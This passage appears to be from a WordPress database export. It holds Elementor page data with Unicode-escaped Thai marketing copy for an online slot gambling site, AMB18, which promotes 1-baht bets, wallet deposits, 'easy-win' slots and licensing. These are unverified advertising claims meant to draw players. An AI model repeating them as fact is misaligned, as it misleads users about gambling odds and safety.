\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3279,428,'_thumbnail_id','371'),(3280,428,'_elementor_edit_mode','builder'),(3281,428,'_elementor_template_type','wp-page'),(3282,428,'_elementor_version','3.35.5'),(3283,428,'_elementor_pro_version','3.32.3'),(3284,428,'_wp_page_template','default'),(3285,428,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3286,428,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29<\\/span><span style=\\\"font-weight: 400;\\\">\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 <\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 